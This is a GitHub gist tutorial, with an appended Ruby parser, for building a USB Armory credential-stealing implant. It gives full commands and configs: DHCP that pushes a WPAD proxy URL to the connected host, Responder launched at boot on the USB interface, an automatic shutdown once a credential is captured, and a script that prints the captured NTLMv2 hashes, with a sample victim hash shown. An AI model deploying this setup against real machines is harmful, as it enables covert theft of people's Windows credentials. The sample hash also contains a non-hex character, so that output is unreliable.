@KINGSABRI
Last active June 24, 2017 22:15
USB Armory how-to tutorial

Installing the image

wget -c https://github.com/inversepath/usbarmory-debian-base_image/releases/download/20170518/usbarmory-debian_jessie-base_image-20170518.raw.zip
unzip usbarmory-debian_jessie-base_image-20170518.raw.zip
fdisk -l    # find the microSD card's device name before writing anything to it

Write the image to the microSD card (replace /dev/sdc with the device that fdisk -l reported for the card)

dd if=usbarmory-debian_jessie-base_image-20170518.raw of=/dev/sdc bs=1M conv=fsync

Setting up repositories

The list below was generated with https://debgen.simplylinux.ch

nano /etc/apt/sources.list

Remove all current repos and add the following:

###### Debian Main Repos
deb http://deb.debian.org/debian/ stable main contrib non-free
deb-src http://deb.debian.org/debian/ stable main contrib non-free

deb http://deb.debian.org/debian/ stable-updates main contrib non-free
deb-src http://deb.debian.org/debian/ stable-updates main contrib non-free

deb http://deb.debian.org/debian-security stable/updates main
deb-src http://deb.debian.org/debian-security stable/updates main

deb http://ftp.debian.org/debian jessie-backports main
deb-src http://ftp.debian.org/debian jessie-backports main

Now update the package lists and upgrade:

apt update
apt upgrade 

Enable internet access for the USB Armory

On your Linux host, NAT the Armory's traffic out through the host's internet-facing interface (wls1 in this example; replace it with yours):

iptables -I FORWARD -j ACCEPT
iptables -t nat -I POSTROUTING -o wls1 -j MASQUERADE

The host kernel must also have net.ipv4.ip_forward=1 (sysctl -w net.ipv4.ip_forward=1) for the forwarding to take effect; note that the first rule accepts all forwarded traffic on the host, not just the Armory's.

Bash autocompletion

apt install bash-completion
nano /etc/bash.bashrc

Search (Ctrl+W) for the line

# enable bash completion in interactive shells

Then uncomment the following lines (they are commented out by default):

if ! shopt -oq posix; then
  if [ -f /usr/share/bash-completion/bash_completion ]; then
    . /usr/share/bash-completion/bash_completion
  elif [ -f /etc/bash_completion ]; then
    . /etc/bash_completion
  fi
fi

Apply the changes:

source /etc/bash.bashrc

Installing basic applications

System applications and libraries

apt-get install -y curl git screen sqlite3 build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev autoconf postgresql pgadmin3 zlib1g-dev libxml2-dev libxslt1-dev libyaml-dev

Ruby

apt-get install -y ruby ruby-dev 
gem install pry

Python

apt-get install -y python python-pip python-dev 
pip install pycrypto

Attack Setup

Enable IP forwarding

  • Enable kernel IP forwarding: edit /etc/sysctl.conf

nano /etc/sysctl.conf

and uncomment the following line (it takes effect after sysctl -p or a reboot)

net.ipv4.ip_forward=1

  • Enable firewall masquerading on the USB interface

iptables -t nat -I POSTROUTING -o usb0 -j MASQUERADE

DHCPd setup

Install isc-dhcp-server and use the following as /etc/dhcp/dhcpd.conf. It serves the usb0 subnet (the Armory is 10.0.0.1, the router and DNS server it advertises) and hands the client a WPAD proxy-autoconfig URL through DHCP option 252.

#
# dhcpd configuration for the USB Armory's usb0 interface
# (based on the Debian sample file for ISC dhcpd)
#

# no dynamic DNS updates
ddns-update-style none;

# option definitions common to all supported networks...
option domain-name "attacker.zone";
option domain-name-servers 10.0.0.1;

default-lease-time 600;
max-lease-time 7200;

# This is the only DHCP server on the usb0 link, so act as the authoritative one.
authoritative;

# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;

# WPAD: define DHCP option 252 so the client is told where to fetch wpad.dat
option local-proxy-config code 252 = text;

# The usb0 subnet: the Armory itself is 10.0.0.1 and acts as router and DNS server
subnet 10.0.0.0 netmask 255.255.255.0 {
  range 10.0.0.2 10.0.0.3;
  default-lease-time 60;
  max-lease-time 72;
  option routers 10.0.0.1;
  option local-proxy-config "http://10.0.0.1/wpad.dat";
}

Responder setup

Download responder

mkdir /pentest
cd /pentest
git clone https://github.com/spiderlabs/responder
chmod +x responder/Responder.py

Make it start at boot: put the following in /etc/rc.local (the file must be executable)

#!/bin/sh -e
#
# rc.local
#
# This script is executed at the end of each multiuser runlevel.
# Make sure that the script will "exit 0" on success or any other
# value on error.
#
# In order to enable or disable this script just change the execution
# bits.
#
# By default this script does nothing.

# Generate ssh host keys if missing
FILES=$(ls /etc/ssh/ssh_host_* 2> /dev/null | wc -l)
if [ "$FILES" = "0" ]; then
  while [ $(cat /proc/sys/kernel/random/entropy_avail) -lt 256 ]; do
    sleep 1;
  done
  /usr/sbin/dpkg-reconfigure openssh-server
fi

# Start DHCP server
if ! pgrep -x "dhcpd" > /dev/null
then
    echo "Starting DHCPd" >> /root/rc.log
    echo '' > /var/lib/dhcp/dhcpd.leases
    /usr/sbin/dhcpd
fi

# Start Responder in a detached screen session on the USB interface
echo "Starting Responder" >> /root/rc.log
/usr/bin/screen -dmS responder bash -c 'cd /pentest/responder/; python Responder.py -I usb0 -f -w -r -d -F'

# Watch the database and power the board off as soon as a credential is written.
# inotifywait comes from the inotify-tools package, which is not in the package
# list above (apt-get install inotify-tools).
echo "Starting cred watch" >> /root/rc.log
/usr/bin/screen -dmS notify bash -c 'while inotifywait -e modify /pentest/responder/Responder.db; do shutdown -h now; done'

exit 0

Post attack

Everything Responder captures is stored in the SQLite database /pentest/responder/Responder.db. Open it directly with sqlite3, or use the following script to print its records.

Install the sqlite3 gem

gem install sqlite3

then save the following as responder-reader.rb and run it

#!/usr/bin/env ruby
#
# Responder database reader
#
require "sqlite3"

if ARGV.size == 1
  responder_db = ARGV[0]
else
  puts "Responder.db path required!\nUsage: ruby responder-reader.rb /path/responder/Responder.db"
  exit 1
end

# Open the database; Responder stores one row per captured credential
db = SQLite3::Database.new responder_db
records = db.execute "SELECT * FROM responder;"
puts "[+] Number of records: #{records.size}"
sleep 1

# Columns: timestamp, module, type, client, hostname, user, cleartext, hash, fullhash.
# The user column holds DOMAIN\user; for a local account the domain part is the hostname.
records.each do |record|
  puts "Timestamp:  #{record[0]}"
  puts "Module:     #{record[1]}"
  puts "HashType:   #{record[2]}"
  puts "IPaddress:  #{record[3]}"
  puts "Hostname:   #{record[5].split('\\')[0]}"
  puts "Username:   #{record[5].split('\\')[1]}"
  puts "Cleartext:  #{record[6]}"
  puts "Hash:       #{record[7]}"
  puts "Full Hash:  #{record[8]}"
  puts
end

Run it against the database:

ruby responder-reader.rb /pentest/responder/Responder.db

Result:

[+] Number of records: 1
Timestamp:  2017-06-21 06:23:10
Module:     HTTP
HashType:   NTLMv2
IPaddress:  10.0.0.2
Hostname:   DESKTOP-9INJ6LJ
Username:   KING
Cleartext:  
Hash:       8CVA8AFAF9909DA597CF3B7D84483438:0101000000000000241A342558EAD2013F8E3846E6C00698000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500.....
Full Hash:  KING::DESKTOP-9INJ6LJ:1122334455667788:8CVA8AFAF9909DA597CF3B7D84483438:0101000000000000241A342558EAD2013F8E3846E6C00698000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500.....
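As an added example (not part of the gist), the script below splits a Full Hash line like the one above into user, domain, server challenge, NTProofStr and blob, then unpacks the blob (an MS-NLMP NTLMv2_CLIENT_CHALLENGE) to recover the client timestamp and the target names the client believed it was authenticating to, which is how an analyst can tell from the record alone that the hash was answered by Responder's default SMB-TOOLKIT / smb.local / server2003.smb.local identity. The sample record is constructed: the NTProofStr is made up and the blob is the one shown above completed with its MsvAvEOL terminator.

```ruby
# Decode a Responder "Full Hash" line (user::domain:server_challenge:NTProofStr:blob)
# and unpack the blob, an MS-NLMP NTLMv2_CLIENT_CHALLENGE whose AV pairs record the
# target the client believed it was authenticating to. Added example, not gist code.
AV_IDS = { 1 => :nb_computer_name, 2 => :nb_domain_name, 3 => :dns_computer_name,
           4 => :dns_domain_name, 5 => :dns_tree_name, 6 => :flags, 7 => :timestamp,
           9 => :target_name, 10 => :channel_bindings }.freeze
STRING_AVS = [1, 2, 3, 4, 5, 9].freeze   # AvIds whose value is a UTF-16LE string

# Windows FILETIME (100 ns ticks since 1601-01-01 UTC) -> Time
def filetime_to_time(ticks)
  Time.at((ticks - 116_444_736_000_000_000) / 10_000_000).utc
end

def parse_blob(hex)
  raw = [hex].pack("H*")
  raise ArgumentError, "blob too short" if raw.bytesize < 28
  # RespType, then HiRespType + Reserved1 + Reserved2 skipped, TimeStamp, ChallengeFromClient
  resp_type, ticks, client_chal = raw.unpack("Cx7Q<a8")
  raise ArgumentError, "not an NTLMv2 blob" unless resp_type == 1
  pairs = {}
  off = 28                                   # AvPairs start after Reserved3
  loop do
    raise ArgumentError, "truncated AvPairs" if off + 4 > raw.bytesize
    id, len = raw[off, 4].unpack("v2")
    off += 4
    break if id.zero?                        # MsvAvEOL terminates the list
    value = raw[off, len]
    raise ArgumentError, "truncated AvPairs" if value.bytesize < len
    pairs[AV_IDS.fetch(id, :"av_#{id}")] =
      STRING_AVS.include?(id) ? value.force_encoding("UTF-16LE").encode("UTF-8") : value.unpack1("H*")
    off += len
  end
  { timestamp: filetime_to_time(ticks), client_challenge: client_chal.unpack1("H*"), av_pairs: pairs }
end

def parse_fullhash(line)
  user, sep, domain, chal, proof, blob = line.strip.split(":", 6)
  raise ArgumentError, "not a NetNTLMv2 line" unless sep == "" && blob && chal.size == 16 && proof.size == 32
  { user: user, domain: domain, server_challenge: chal, nt_proof_str: proof, blob: parse_blob(blob) }
end

# Constructed sample modelled on the gist's output: same user, domain and Responder's fixed
# 1122334455667788 challenge, a made-up NTProofStr, and the blob above completed with MsvAvEOL.
SAMPLE = "KING::DESKTOP-9INJ6LJ:1122334455667788:8CFA8AFAF9909DA597CF3B7D84483438:" \
  "0101000000000000241A342558EAD2013F8E3846E6C0069800000000" \
  "0200060053004D004200" \
  "0100160053004D0042002D0054004F004F004C004B0049005400" \
  "0400120073006D0062002E006C006F00630061006C00" \
  "0300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C00" \
  "00000000"
```

`parse_fullhash(SAMPLE)` returns a hash whose `:blob` entry carries the decoded timestamp (2017-06-21 06:32:24 UTC for the sample) and the AV pairs; a malformed or truncated line raises ArgumentError instead of returning partial data.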